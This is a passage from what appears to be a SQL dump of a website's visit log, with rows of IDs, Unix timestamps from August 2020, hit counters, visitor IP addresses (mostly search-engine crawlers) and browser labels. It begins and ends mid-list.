(529768,1596893125,2,2,0,0,'66.249.64.36','chrome'),(529769,1596893989,1,1,0,0,'209.17.96.130','other'),(529770,1596894427,7,7,0,0,'66.249.70.72','chrome'),(529771,1596894461,5,5,0,0,'66.249.70.69','chrome'),(529772,1596894699,6,6,0,0,'66.249.70.70','chrome'),(529773,1596894778,1,1,0,0,'66.249.64.36','chrome'),(529774,1596895021,2,2,0,0,'66.249.64.33','chrome'),(529775,1596895428,7,7,0,0,'66.249.70.69','chrome'),(529776,1596896180,1,1,0,0,'66.249.70.72','chrome'),(529777,1596896192,4,4,0,0,'66.249.70.70','chrome'),(529778,1596896993,2,2,0,0,'66.249.70.69','chrome'),(529779,1596897401,2,2,0,0,'94.153.80.145','chrome'),(529780,1596897547,5,5,0,0,'66.249.70.70','chrome'),(529781,1596897747,1,1,0,0,'8.29.198.27','other'),(529782,1596897983,4,4,0,0,'66.249.70.69','chrome'),(529783,1596898065,1,1,0,0,'66.249.64.33','chrome'),(529784,1596898417,2,2,0,0,'66.249.70.72','chrome'),(529785,1596899299,2,2,0,0,'66.249.64.38','chrome'),(529786,1596899331,1,1,0,0,'37.73.126.212','chrome'),(529787,1596899346,1,1,0,0,'66.249.70.69','chrome'),(529788,1596899414,1,1,0,0,'66.249.70.72','chrome'),(529789,1596899438,1,1,0,0,'138.246.253.15','chrome'),(529790,1596899541,1,1,0,0,'178.154.200.105','other'),(529791,1596899915,1,1,0,0,'66.249.64.33','chrome'),(529792,1596900462,1,1,0,0,'66.249.70.69','chrome'),(529793,1596900696,1,1,0,0,'66.249.70.72','chrome'),(529794,1596901916,5,5,0,0,'66.249.70.70','chrome'),(529795,1596902023,4,4,0,0,'66.249.70.72','chrome'),(529796,1596902025,3,3,0,0,'66.249.70.69','chrome'),(529797,1596902249,1,1,0,0,'66.249.64.38','chrome'),(529798,1596903009,1,1,0,0,'66.249.64.33','chrome'),(529799,1596903094,1,1,0,0,'5.45.207.174','other'),(529800,1596903295,1,1,0,0,'66.249.70.70','chrome'),(529801,1596903353,3,3,0,0,'66.249.70.72','chrome'),(529802,1596903708,2,2,0,0,'66.249.70.69','chrome'),(529803,1596904096,1,1,0,0,'66.249.64.38','chrome'),(529804,1596904290,2,2,0,0,'66.249.70.72','chrome'),(529805,1596904456,2,2,0,0,'66.249.64.33','chrome'),(529806,1596904518,3,3,0,0,'66.249.70.70','chrome'),(529807,1596904739,2,2,0,0,'66.249.70.69','chrome'),(529808,1596905198,1,1,0,0,'95.85.39.110','firefox'),(529809,1596905249,4,4,0,0,'89.148.36.250','chrome'),(529810,1596905497,1,1,0,0,'207.46.13.109','other'),(529811,1596906078,1,1,0,0,'178.154.200.51','other'),(529812,1596906710,1,1,0,0,'66.249.70.70','chrome'),(529813,1596907118,1,1,0,0,'66.249.70.72','chrome'),(529814,1596907354,1,1,0,0,'66.249.64.33','chrome'),(529815,1596908260,1,1,0,0,'178.154.200.28','other'),(529816,1596908571,1,1,0,0,'8.29.198.25','other'),(529817,1596908618,1,1,0,0,'66.249.70.69','chrome'),(529818,1596909291,1,1,0,0,'66.249.70.70','chrome'),(529819,1596909625,1,1,0,0,'5.45.207.135','other'),(529820,1596909843,2,2,0,0,'178.154.200.51','other'),(529821,1596910525,2,2,0,0,'66.249.70.70','chrome'),(529822,1596911352,2,2,0,0,'66.249.64.38','chrome'),(529823,1596911403,1,1,0,0,'66.249.70.69','chrome'),(529824,1596911984,1,1,0,0,'66.249.64.36','chrome'),(529825,1596912044,1,1,0,0,'17.58.99.84','other'),(529826,1596912194,1,1,0,0,'5.255.253.105','other'),(529827,1596912926,2,2,0,0,'66.249.70.72','chrome'),(529828,1596912955,2,2,0,0,'66.249.70.70','chrome'),(529829,1596913355,1,1,0,0,'5.9.70.117','other'),(529830,1596913797,2,2,0,0,'66.249.64.36','chrome'),(529831,1596913822,1,1,0,0,'66.249.64.38','chrome'),(529832,1596913940,4,4,0,0,'66.249.70.69','chrome'),(529833,1596913968,3,3,0,0,'66.249.70.70','chrome'),(529834,1596914049,1,1,0,0,'66.249.70.72','chrome'),(529835,1596914587,9,9,0,0,'94.130.9.183','other'),(529836,1596914728,1,1,0,0,'66.249.64.36','chrome'),(529837,1596914901,2,2,0,0,'66.249.64.38','chrome'),(529838,1596914928,4,4,0,0,'66.249.70.69','chrome'),(529839,1596915434,2,2,0,0,'66.249.64.33','chrome'),(529840,1596915453,3,3,0,0,'66.249.70.72','chrome'),(529841,1596915490,8,8,0,0,'94.130.9.183','other'),(529842,1596915500,1,1,0,0,'178.154.200.19','other'),(529843,1596915683,2,2,0,0,'66.249.70.70','chrome'),(529844,1596915964,3,3,0,0,'207.46.13.44','other'),(529845,1596916395,6,6,0,0,'94.130.9.183','other'),(529846,1596916491,1,1,0,0,'66.249.70.72','chrome'),(529847,1596916648,2,2,0,0,'66.249.70.70','chrome'),(529848,1596916795,2,2,0,0,'157.55.39.244','other'),(529849,1596916818,2,2,0,0,'66.249.70.69','chrome'),(529850,1596917161,1,1,0,0,'66.249.64.38','chrome'),(529851,1596917343,4,4,0,0,'94.130.9.183','other'),(529852,1596917701,2,2,0,0,'66.249.70.70','chrome'),(529853,1596917894,4,4,0,0,'66.249.70.72','chrome'),(529854,1596917904,2,2,0,0,'66.249.70.69','chrome'),(529855,1596918377,1,1,0,0,'66.249.64.36','chrome'),(529856,1596918782,1,1,0,0,'94.153.18.227','other'),(529857,1596918826,4,4,0,0,'66.249.70.69','chrome'),(529858,1596919245,4,4,0,0,'66.249.70.72','chrome'),(529859,1596919397,1,1,0,0,'8.29.198.25','other'),(529860,1596919500,2,2,0,0,'66.249.70.70','chrome'),(529861,1596919832,5,5,0,0,'66.249.70.69','chrome'),(529862,1596919938,1,1,0,0,'5.45.207.174','other'),(529863,1596920101,1,1,0,0,'66.249.64.33','chrome'),(529864,1596920856,6,6,0,0,'66.249.70.69','chrome'),(529865,1596921070,2,2,0,0,'207.46.13.44','other'),(529866,1596921202,3,3,0,0,'66.249.70.70','chrome'),(529867,1596921246,2,2,0,0,'66.249.70.72','chrome'),(529868,1596922189,2,2,0,0,'207.46.13.125','other'),(529869,1596922473,1,1,0,0,'17.58.99.84','other'),(529870,1596922480,4,4,0,0,'66.249.70.69','chrome'),(529871,1596922523,1,1,0,0,'66.249.70.72','chrome'),(529872,1596922633,2,2,0,0,'66.249.64.33','chrome'),(529873,1596922725,2,2,0,0,'66.249.70.70','chrome'),(529874,1596922864,2,2,0,0,'66.249.64.38','chrome'),(529875,1596923682,1,1,0,0,'66.249.64.36','chrome'),(529876,1596923766,4,4,0,0,'66.249.70.70','chrome'),(529877,1596924199,2,2,0,0,'66.249.70.69','chrome'),(529878,1596924730,1,1,0,0,'66.249.64.38','chrome'),(529879,1596924937,5,5,0,0,'66.249.70.70','chrome'),(529880,1596925286,2,2,0,0,'66.249.70.72','chrome'),(529881,1596925443,1,1,0,0,'89.187.168.136','chrome'),(529882,1596925865,1,1,0,0,'207.46.13.26','other'),(529883,1596926087,2,2,0,0,'66.249.64.36','chrome'),(529884,1596926241,1,1,0,0,'207.46.13.129','other'),(529885,1596926361,3,3,0,0,'66.249.70.70','chrome'),(529886,1596926529,3,3,0,0,'66.249.70.72','chrome'),(529887,1596926904,3,3,0,0,'66.249.70.69','chrome'),(529888,1596927406,1,1,0,0,'178.154.200.115','other'),(529889,1596927866,1,1,0,0,'66.249.70.72','chrome'),(529890,1596928168,1,1,0,0,'66.249.70.69','chrome'),(529891,1596928173,1,1,0,0,'5.45.207.174','other'),(529892,1596928215,1,1,0,0,'173.212.233.72','firefox'),(529893,1596928384,2,2,0,0,'66.249.70.70','chrome'),(529894,1596928630,1,1,0,0,'157.55.39.244','other'),(529895,1596929626,1,1,0,0,'66.249.64.33','chrome'),(529896,1596930223,1,1,0,0,'8.29.198.26','other'),(529897,1596930288,2,2,0,0,'66.249.70.69','chrome'),(529898,1596930367,2,2,0,0,'66.249.70.72','chrome'),(529899,1596930375,1,1,0,0,'66.249.70.70','chrome'),(529900,1596930533,2,2,0,0,'17.58.99.84','other'),(529901,1596930910,1,1,0,0,'62.205.134.182','other'),(529902,1596931513,1,1,0,0,'13.58.136.96','chrome'),(529903,1596932375,1,1,0,0,'5.255.253.88','other'),(529904,1596933259,1,1,0,0,'157.55.39.250','other'),(529905,1596934086,1,1,0,0,'69.171.251.11','other'),(529906,1596934835,1,1,0,0,'54.154.66.183','chrome'),(529907,1596935639,1,1,0,0,'17.58.99.84','other'),(529908,1596936338,1,1,0,0,'66.249.70.70','chrome'),(529909,1596936699,1,1,0,0,'66.249.64.33','chrome'),(529910,1596936841,1,1,0,0,'66.249.64.38','chrome'),(529911,1596937571,1,1,0,0,'66.249.70.72','chrome'),(529912,1596938390,3,3,0,0,'66.249.70.70','chrome'),(529913,1596940341,1,1,0,0,'178.154.200.112','other'),(529914,1596940825,1,1,0,0,'82.145.210.21','chrome'),(529915,1596941055,1,1,0,0,'8.29.198.25','other'),(529916,1596941333,1,1,0,0,'5.45.207.135','other'),(529917,1596941476,1,1,0,0,'5.255.253.88','other'),(529918,1596941590,1,1,0,0,'17.58.99.84','other'),(529919,1596941793,2,2,0,0,'66.249.70.69','chrome'),(529920,1596941988,1,1,0,0,'66.249.70.72','chrome'),(529921,1596942034,1,1,0,0,'66.249.64.33','chrome'),(529922,1596942917,1,1,0,0,'66.249.70.72','chrome'),(529923,1596943070,1,1,0,0,'66.249.64.33','chrome'),(529924,1596943337,1,1,0,0,'178.154.200.112','other'),(529925,1596944206,3,3,0,0,'66.249.70.69','chrome'),(529926,1596945624,3,3,0,0,'66.249.70.69','chrome'),(529927,1596945878,1,1,0,0,'66.249.70.70','chrome'),(529928,1596946092,1,1,0,0,'66.249.64.38','chrome'),(529929,1596946783,1,1,0,0,'66.249.70.69','chrome'),(529930,1596946823,1,1,0,0,'66.249.64.36','chrome'),(529931,1596946959,2,2,0,0,'66.249.70.72','chrome'),(529932,1596947040,1,1,0,0,'17.58.99.84','other'),(529933,1596948785,1,1,0,0,'66.249.64.33','chrome'),(529934,1596948966,1,1,0,0,'62.205.134.182','other'),(529935,1596949029,1,1,0,0,'66.249.70.69','chrome'),(529936,1596949177,1,1,0,0,'131.220.6.152','chrome'),(529937,1596949601,2,2,0,0,'66.249.70.72','chrome'),(529938,1596949606,1,1,0,0,'66.249.70.70','chrome'),(529939,1596950617,3,3,0,0,'66.249.70.69','chrome'),(529940,1596950697,3,2,1,0,'66.249.70.70',''),(529941,1596950711,1,1,0,0,'66.249.70.72','chrome'),(529942,1596951344,2,1,1,0,'66.249.70.70',''),(529943,1596951597,4,4,0,0,'66.249.70.70','chrome'),(529944,1596951647,1,0,1,0,'66.249.70.72',''),(529945,1596951886,1,1,0,0,'8.29.198.25','other'),(529946,1596952090,3,3,0,0,'66.249.70.69','chrome'),(529947,1596952229,1,1,0,0,'66.249.70.72','chrome'),(529948,1596952396,1,1,0,0,'17.58.99.84','other'),(529949,1596952777,2,2,0,0,'131.220.6.156','chrome'),(529950,1596953562,8,8,0,0,'207.244.157.10','other'),(529951,1596953628,2,2,0,0,'66.249.70.69','chrome'),(529952,1596953629,3,3,0,0,'66.249.70.72','chrome'),(529953,1596953666,3,3,0,0,'66.249.70.70','chrome'),(529954,1596953680,1,1,0,0,'66.249.64.36','chrome'),(529955,1596955006,1,1,0,0,'66.249.70.69','chrome'),(529956,1596955237,3,2,1,0,'66.249.70.72',''),(529957,1596955243,1,1,0,0,'66.249.70.70','chrome'),(529958,1596955815,1,1,0,0,'66.249.70.72','chrome'),(529959,1596956141,1,1,0,0,'66.249.64.33','chrome'),(529960,1596956966,1,1,0,0,'66.249.70.72','chrome'),(529961,1596956972,1,0,1,0,'66.249.70.70',''),(529962,1596956985,30,30,0,0,'207.244.157.10','other'),(529963,1596957917,18,18,0,0,'207.244.157.10','other'),(529964,1596958358,2,2,0,0,'66.249.70.70','chrome'),(529965,1596958394,2,2,0,0,'66.249.70.69','chrome'),(529966,1596958477,2,2,0,0,'66.249.70.72','chrome'),(529967,1596958919,15,15,0,0,'207.244.157.10','other'),(529968,1596959443,2,2,0,0,'66.249.64.33','chrome'),(529969,1596959480,1,1,0,0,'66.249.70.70','chrome'),(529970,1596959503,4,4,0,0,'66.249.70.69','chrome'),(529971,1596959638,1,1,0,0,'178.154.200.142','other'),(529972,1596960658,2,2,0,0,'66.249.64.36','chrome'),(529973,1596960882,1,1,0,0,'66.249.64.33','chrome'),(529974,1596961518,6,6,0,0,'66.249.70.70','chrome'),(529975,1596961520,3,3,0,0,'66.249.70.69','chrome'),(529976,1596961761,2,2,0,0,'66.249.70.72','chrome'),(529977,1596962214,1,1,0,0,'66.249.64.38','chrome'),(529978,1596962422,2,2,0,0,'66.249.70.69','chrome'),(529979,1596962668,1,1,0,0,'66.249.70.72','chrome'),(529980,1596962678,1,0,1,0,'66.249.64.36',''),(529981,1596962696,2,2,0,0,'66.249.64.36','chrome'),(529982,1596962709,1,1,0,0,'8.29.198.27','other'),(529983,1596963438,4,4,0,0,'66.249.70.70','chrome'),(529984,1596963531,3,3,0,0,'66.249.70.69','chrome'),(529985,1596964207,1,1,0,0,'66.249.70.72','chrome'),(529986,1596964438,2,2,0,0,'66.249.70.70','chrome'),(529987,1596964825,4,4,0,0,'66.249.64.38','chrome'),(529988,1596964847,4,4,0,0,'66.249.70.69','chrome'),(529989,1596965465,1,1,0,0,'66.249.70.70','chrome'),(529990,1596965854,1,1,0,0,'66.249.70.72','chrome'),(529991,1596965991,2,2,0,0,'66.249.64.36','chrome'),(529992,1596966364,3,3,0,0,'66.249.70.69','chrome'),(529993,1596967064,1,1,0,0,'66.249.64.36','chrome'),(529994,1596967173,1,1,0,0,'66.249.70.70','chrome'),(529995,1596967358,1,1,0,0,'104.131.82.182','other'),(529996,1596967529,1,1,0,0,'104.131.44.227','other'),(529997,1596968037,2,2,0,0,'66.249.70.69','chrome'),(529998,1596968339,3,3,0,0,'66.249.70.72','chrome'),(529999,1596968392,1,1,0,0,'17.58.99.84','other'),(530000,1596968610,1,1,0,0,'66.249.70.70','chrome'),(530001,1596968947,1,1,0,0,'66.249.64.33','chrome'),(530002,1596970066,3,3,0,0,'66.249.70.70','chrome'),(530003,1596970097,1,1,0,0,'66.249.70.69','chrome'),(530004,1596970475,1,1,0,0,'109.74.154.72','chrome'),(530005,1596971056,1,1,0,0,'66.249.64.36','chrome'),(530006,1596971165,1,1,0,0,'66.249.70.69','chrome'),(530007,1596971290,1,1,0,0,'178.154.200.125','other'),(530008,1596971604,3,3,0,0,'66.249.70.70','chrome'),(530009,1596971854,1,1,0,0,'5.255.253.151','other'),(530010,1596972257,2,2,0,0,'66.249.70.72','chrome'),(530011,1596972377,1,1,0,0,'66.249.64.36','chrome'),(530012,1596972885,1,1,0,0,'66.249.70.69','chrome'),(530013,1596972892,2,2,0,0,'66.249.70.70','chrome'),(530014,1596973064,1,1,0,0,'66.249.64.33','chrome'),(530015,1596973185,1,1,0,0,'17.58.99.84','other'),(530016,1596973385,1,1,0,0,'66.249.70.72','chrome'),(530017,1596973536,1,1,0,0,'8.29.198.27','other'),(530018,1596973925,2,2,0,0,'66.249.70.69','chrome'),(530019,1596974567,1,1,0,0,'178.154.200.115','other'),(530020,1596974644,2,2,0,0,'66.249.64.33','chrome'),(530021,1596974838,2,2,0,0,'66.249.70.69','chrome'),(530022,1596974850,1,1,0,0,'66.249.64.36','chrome'),(530023,1596974913,1,1,0,0,'66.249.70.70','chrome'),(530024,1596976079,2,2,0,0,'66.249.70.70','chrome'),(530025,1596976135,2,2,0,0,'66.249.70.69','chrome'),(530026,1596976385,1,1,0,0,'66.249.70.72','chrome'),(530027,1596977160,1,1,0,0,'66.249.64.38','chrome'),(530028,1596977206,3,3,0,0,'66.249.70.69','chrome'),(530029,1596977345,2,2,0,0,'66.249.70.70','chrome'),(530030,1596977617,2,2,0,0,'66.249.70.72','chrome'),(530031,1596977753,1,1,0,0,'66.249.64.36','chrome'),(530032,1596978138,1,1,0,0,'66.249.70.69','chrome'),(530033,1596978772,1,1,0,0,'66.249.70.70','chrome'),(530034,1596979462,1,1,0,0,'66.249.70.72','chrome'),(530035,1596979522,1,1,0,0,'66.249.64.36','chrome'),(530036,1596980120,1,1,0,0,'66.249.70.69','chrome'),(530037,1596980390,2,2,0,0,'66.249.70.70','chrome'),(530038,1596980433,2,2,0,0,'66.249.70.72','chrome'),(530039,1596982035,1,1,0,0,'66.249.64.38','chrome'),(530040,1596982760,8,8,0,0,'109.108.71.11','other'),(530041,1596983349,1,1,0,0,'5.45.207.174','other'),(530042,1596983821,8,8,0,0,'109.108.71.11','other'),(530043,1596984360,1,1,0,0,'8.29.198.26','other'),(530044,1596984637,1,1,0,0,'37.55.227.202','chrome'),(530045,1596985043,8,8,0,0,'109.108.71.11','other'),(530046,1596985561,1,1,0,0,'94.153.134.142','chrome'),(530047,1596985758,1,1,0,0,'91.196.178.37','firefox'),(530048,1596986131,1,1,0,0,'66.249.70.72','chrome'),(530049,1596986578,8,8,0,0,'109.108.71.11','other'),(530050,1596986690,1,1,0,0,'66.249.70.69','chrome'),(530051,1596986698,2,2,0,0,'66.249.70.70','chrome'),(530052,1596988330,1,1,0,0,'66.249.70.72','chrome'),(530053,1596988375,8,8,0,0,'109.108.71.11','other'),(530054,1596988785,2,2,0,0,'66.249.70.70','chrome'),(530055,1596988954,2,2,0,0,'66.249.70.69','chrome'),(530056,1596990433,5,5,0,0,'66.249.70.69','chrome'),(530057,1596990684,8,8,0,0,'109.108.71.11','other'),(530058,1596990850,1,1,0,0,'66.249.70.70','chrome'),(530059,1596992119,1,1,0,0,'66.249.70.72','chrome'),(530060,1596992196,1,1,0,0,'66.249.64.38','chrome'),(530061,1596992544,2,2,0,0,'66.249.70.70','chrome'),(530062,1596992591,1,1,0,0,'66.249.64.36','chrome'),(530063,1596993383,1,1,0,0,'66.249.70.72','chrome'),(530064,1596993599,8,8,0,0,'109.108.71.11','other'),(530065,1596993632,1,1,0,0,'5.45.207.92','other'),(530066,1596993738,1,1,0,0,'66.249.64.36','chrome'),(530067,1596994056,3,3,0,0,'66.249.70.70','chrome'),(530068,1596994228,2,2,0,0,'66.249.64.38','chrome'),(530069,1596994699,2,2,0,0,'66.249.70.72','chrome'),(530070,1596995106,5,4,1,0,'66.249.70.69',''),(530071,1596995141,3,3,0,0,'66.249.70.70','chrome'),(530072,1596995182,1,1,0,0,'8.29.198.26','other'),(530073,1596996201,3,3,0,0,'66.249.70.70','chrome'),(530074,1596996288,4,4,0,0,'66.249.70.69','chrome'),(530075,1596996648,1,1,0,0,'66.249.64.36','chrome'),(530076,1596997049,1,1,0,0,'5.255.253.183','other'),(530077,1596997860,2,2,0,0,'66.249.70.72','chrome'),(530078,1596997871,3,3,0,0,'66.249.70.70','chrome'),(530079,1596997884,3,3,0,0,'66.249.70.69','chrome'),(530080,1596998050,1,1,0,0,'5.45.207.92','other'),(530081,1596998089,1,1,0,0,'66.249.64.36','chrome'),(530082,1596998328,1,1,0,0,'5.255.253.105','other'),(530083,1596998811,1,1,0,0,'213.180.203.57','other'),(530084,1596998917,2,2,0,0,'66.249.70.72','chrome'),(530085,1596999045,2,1,1,0,'66.249.70.70',''),(530086,1596999360,8,8,0,0,'109.108.71.11','other'),(530087,1596999670,2,2,0,0,'66.249.70.69','chrome'),(530088,1596999824,2,2,0,0,'213.231.43.42','other'),(530089,1597000046,1,1,0,0,'66.249.64.38','chrome'),(530090,1597000147,3,3,0,0,'66.249.70.70','chrome'),(530091,1597000394,1,1,0,0,'95.216.96.244','other'),(530092,1597001384,3,3,0,0,'66.249.70.70','chrome'),(530093,1597001624,1,1,0,0,'66.249.70.72','chrome'),(530094,1597001971,1,1,0,0,'95.216.96.244','other'),(530095,1597002272,1,1,0,0,'77.111.244.6','chrome'),(530096,1597002564,1,1,0,0,'66.249.64.36','chrome'),(530097,1597002566,1,1,0,0,'46.133.52.39','chrome'),(530098,1597002697,2,2,0,0,'66.249.70.69','chrome'),(530099,1597003246,1,1,0,0,'54.37.160.146','chrome'),(530100,1597003732,2,2,0,0,'66.249.70.70','chrome'),(530101,1597004046,1,1,0,0,'66.249.64.33','chrome'),(530102,1597004147,4,4,0,0,'66.249.70.69','chrome'),(530103,1597004213,3,3,0,0,'66.249.70.72','chrome'),(530104,1597004454,1,1,0,0,'66.249.64.36','chrome'),(530105,1597004457,6,6,0,0,'41.80.138.226','chrome'),(530106,1597004972,4,4,0,0,'66.249.70.70','chrome'),(530107,1597005647,8,8,0,0,'109.108.71.11','other'),(530108,1597005907,2,2,0,0,'66.249.70.70','chrome'),(530109,1597006006,1,1,0,0,'8.29.198.26','other'),(530110,1597006733,1,1,0,0,'66.249.70.69','chrome'),(530111,1597006771,1,1,0,0,'66.249.64.36','chrome'),(530112,1597006798,8,8,0,0,'109.108.71.11','other'),(530113,1597007089,3,3,0,0,'66.249.70.72','chrome'),(530114,1597007623,1,1,0,0,'66.249.64.33','chrome'),(530115,1597007664,2,2,0,0,'66.249.70.70','chrome'),(530116,1597007678,1,1,0,0,'94.103.80.12','chrome'),(530117,1597008015,8,8,0,0,'109.108.71.11','other'),(530118,1597008492,2,2,0,0,'66.249.70.72','chrome'),(530119,1597008495,4,4,0,0,'66.249.70.69','chrome'),(530120,1597008707,1,1,0,0,'66.249.70.70','chrome'),(530121,1597009358,8,8,0,0,'109.108.71.11','other'),(530122,1597010388,7,7,0,0,'66.249.70.70','chrome'),(530123,1597010522,2,2,0,0,'66.249.70.72','chrome'),(530124,1597010549,2,2,0,0,'66.249.70.69','chrome'),(530125,1597010667,3,3,0,0,'34.71.119.60','chrome'),(530126,1597010668,1,1,0,0,'34.71.119.60','other'),(530127,1597010804,8,8,0,0,'109.108.71.11','other'),(530128,1597010830,1,1,0,0,'66.249.64.38','chrome'),(530129,1597011432,1,1,0,0,'66.249.70.70','chrome'),(530130,1597011561,1,1,0,0,'178.154.200.120','other'),(530131,1597011664,2,2,0,0,'66.249.70.69','chrome'),(530132,1597011892,2,2,0,0,'66.249.70.72','chrome'),(530133,1597012424,8,8,0,0,'109.108.71.11','other'),(530134,1597012689,1,1,0,0,'66.249.70.70','chrome'),(530135,1597012922,1,1,0,0,'66.249.70.72','chrome'),(530136,1597012958,1,1,0,0,'66.249.64.36','chrome'),(530137,1597013136,2,2,0,0,'66.249.70.69','chrome'),(530138,1597013624,1,1,0,0,'66.249.70.70','chrome'),(530139,1597013986,2,2,0,0,'66.249.64.36','chrome'),(530140,1597014021,8,8,0,0,'109.108.71.11','other'),(530141,1597014845,2,2,0,0,'66.249.70.72','chrome'),(530142,1597015092,3,3,0,0,'104.154.117.142','chrome'),(530143,1597015094,1,1,0,0,'104.154.117.142','other'),(530144,1597015808,8,8,0,0,'109.108.71.11','other'),(530145,1597015895,2,2,0,0,'66.249.70.70','chrome'),(530146,1597016340,2,2,0,0,'66.249.64.33','chrome'),(530147,1597016831,1,1,0,0,'8.29.198.26','other'),(530148,1597017308,1,1,0,0,'62.205.134.182','other'),(530149,1597017744,8,8,0,0,'109.108.71.11','other'),(530150,1597017786,2,2,0,0,'66.249.70.72','chrome'),(530151,1597017897,1,1,0,0,'66.249.70.70','chrome'),(530152,1597018108,1,1,0,0,'66.249.64.33','chrome'),(530153,1597018410,1,1,0,0,'66.249.64.36','chrome'),(530154,1597018593,1,1,0,0,'66.249.64.38','chrome'),(530155,1597019181,1,1,0,0,'66.249.70.69','chrome'),(530156,1597019299,1,1,0,0,'66.249.70.70','chrome'),(530157,1597019726,1,1,0,0,'66.249.70.72','chrome'),(530158,1597019808,8,8,0,0,'109.108.71.11','other'),(530159,1597019815,2,2,0,0,'66.249.64.36','chrome'),(530160,1597020042,1,1,0,0,'17.58.99.84','other'),(530161,1597020947,2,2,0,0,'66.249.70.72','chrome'),(530162,1597021479,3,3,0,0,'34.66.35.238','chrome'),(530163,1597021480,1,1,0,0,'34.66.35.238','other'),(530164,1597021761,3,3,0,0,'66.249.70.69','chrome'),(530165,1597021958,8,8,0,0,'109.108.71.11','other'),(530166,1597022015,2,2,0,0,'66.249.64.36','chrome'),(530167,1597022037,1,1,0,0,'66.249.70.70','chrome'),(530168,1597022238,1,1,0,0,'66.249.70.72','chrome'),(530169,1597023302,1,1,0,0,'66.249.70.69','chrome'),(530170,1597023316,1,1,0,0,'66.249.64.33','chrome'),(530171,1597023421,1,1,0,0,'66.249.64.36','chrome'),(530172,1597023617,1,1,0,0,'66.249.70.70','chrome'),(530173,1597024271,8,8,0,0,'109.108.71.11','other'),(530174,1597024349,1,1,0,0,'95.220.198.252','chrome'),(530175,1597024352,1,1,0,0,'138.128.11.244','chrome'),(530176,1597024668,1,1,0,0,'66.249.70.72','chrome'),(530177,1597024965,1,1,0,0,'66.249.70.70','chrome'),(530178,1597025314,2,2,0,0,'66.249.70.69','chrome'),(530179,1597025350,1,1,0,0,'66.249.64.33','chrome'),(530180,1597025701,1,1,0,0,'66.249.64.38','chrome'),(530181,1597025820,1,1,0,0,'51.77.52.160','chrome'),(530182,1597026003,3,3,0,0,'66.249.70.72','chrome'),(530183,1597026273,1,1,0,0,'66.249.70.70','chrome'),(530184,1597026418,1,1,0,0,'66.249.70.69','chrome'),(530185,1597026566,3,3,0,0,'34.68.199.137','chrome'),(530186,1597026567,1,1,0,0,'34.68.199.137','other'),(530187,1597026747,8,8,0,0,'109.108.71.11','other'),(530188,1597026805,1,1,0,0,'66.249.64.38','chrome'),(530189,1597027336,2,2,0,0,'66.249.70.69','chrome'),(530190,1597027415,2,2,0,0,'66.249.70.70','chrome'),(530191,1597027619,1,1,0,0,'66.249.64.33','chrome'),(530192,1597027660,1,1,0,0,'8.29.198.25','other'),(530193,1597027804,1,1,0,0,'66.249.64.38','chrome'),(530194,1597028031,1,1,0,0,'66.249.70.72','chrome'),(530195,1597029088,1,1,0,0,'66.249.64.36','chrome'),(530196,1597029107,1,1,0,0,'66.249.70.70','chrome'),(530197,1597029502,1,1,0,0,'66.249.70.69','chrome'),(530198,1597029565,8,8,0,0,'109.108.71.11','other'),(530199,1597030581,1,1,0,0,'54.37.160.146','chrome'),(530200,1597030747,3,3,0,0,'35.222.246.181','chrome'),(530201,1597030748,1,1,0,0,'35.222.246.181','other'),(530202,1597030876,4,4,0,0,'66.249.70.69','chrome'),(530203,1597031159,1,1,0,0,'178.154.200.36','other'),(530204,1597031510,1,1,0,0,'178.154.200.120','other'),(530205,1597031903,1,1,0,0,'66.249.64.38','chrome'),(530206,1597032524,1,1,0,0,'66.249.70.70','chrome'),(530207,1597033876,3,3,0,0,'66.249.70.69','chrome'),(530208,1597034123,3,3,0,0,'66.249.70.72','chrome'),(530209,1597034529,1,1,0,0,'66.249.64.33','chrome'),(530210,1597034722,8,8,0,0,'109.108.71.11','other'),(530211,1597035032,3,3,0,0,'35.232.72.97','chrome'),(530212,1597035033,1,1,0,0,'35.232.72.97','other'),(530213,1597035386,1,1,0,0,'62.205.134.182','other'),(530214,1597035732,1,1,0,0,'66.249.70.72','chrome'),(530215,1597035800,1,1,0,0,'66.249.70.69','chrome'),(530216,1597035830,8,8,0,0,'109.108.71.11','other'),(530217,1597035924,2,2,0,0,'66.249.64.38','chrome'),(530218,1597036363,1,1,0,0,'66.249.70.70','chrome'),(530219,1597036366,1,1,0,0,'66.249.64.36','chrome'),(530220,1597036445,1,1,0,0,'5.128.67.145','msie'),(530221,1597036758,1,0,1,0,'66.249.70.72',''),(530222,1597036778,1,1,0,0,'95.220.198.252','firefox'),(530223,1597036781,1,1,0,0,'23.254.5.121','firefox'),(530224,1597036931,8,8,0,0,'109.108.71.11','other'),(530225,1597037060,1,1,0,0,'51.158.117.104','chrome'),(530226,1597037205,1,1,0,0,'66.249.70.72','chrome'),(530227,1597037401,1,1,0,0,'66.249.64.33','chrome'),(530228,1597037717,1,1,0,0,'66.249.70.69','chrome'),(530229,1597038093,1,1,0,0,'66.249.64.38','chrome'),(530230,1597038104,8,8,0,0,'109.108.71.11','other'),(530231,1597038424,1,1,0,0,'178.154.200.51','other'),(530232,1597038481,1,1,0,0,'8.29.198.25','other'),(530233,1597039464,1,1,0,0,'66.249.70.69','chrome'),(530234,1597039507,1,1,0,0,'207.46.13.167','other'),(530235,1597039560,8,8,0,0,'109.108.71.11','other'),(530236,1597039570,1,1,0,0,'178.154.200.51','other'),(530237,1597039668,2,2,0,0,'66.249.64.36','chrome'),(530238,1597039924,2,2,0,0,'66.249.64.33','chrome'),(530239,1597040268,1,1,0,0,'66.249.70.72','chrome'),(530240,1597040493,1,1,0,0,'66.249.70.69','chrome'),(530241,1597040597,1,1,0,0,'194.99.63.255','chrome'),(530242,1597040644,1,1,0,0,'188.191.233.57','chrome'),(530243,1597040796,1,1,0,0,'66.249.70.70','chrome'),(530244,1597041069,8,8,0,0,'109.108.71.11','other'),(530245,1597041411,1,1,0,0,'66.249.64.38','chrome'),(530246,1597041526,1,1,0,0,'66.249.70.69','chrome'),(530247,1597041540,1,1,0,0,'66.249.64.36','chrome'),(530248,1597041918,2,2,0,0,'66.249.70.70','chrome'),(530249,1597042474,2,2,0,0,'66.249.70.69','chrome'),(530250,1597042740,1,1,0,0,'207.46.13.167','other'),(530251,1597042935,8,8,0,0,'109.108.71.11','other'),(530252,1597043376,2,2,0,0,'66.249.70.72','chrome'),(530253,1597043540,1,1,0,0,'66.249.64.36','chrome'),(530254,1597044226,2,2,0,0,'66.249.70.70','chrome'),(530255,1597044444,1,1,0,0,'66.249.70.69','chrome'),(530256,1597044967,1,1,0,0,'77.111.244.6','chrome'),(530257,1597045160,1,1,0,0,'66.249.70.72','chrome'),(530258,1597045264,1,1,0,0,'66.249.70.70','chrome'),(530259,1597045348,1,1,0,0,'66.249.64.38','chrome'),(530260,1597045615,8,8,0,0,'109.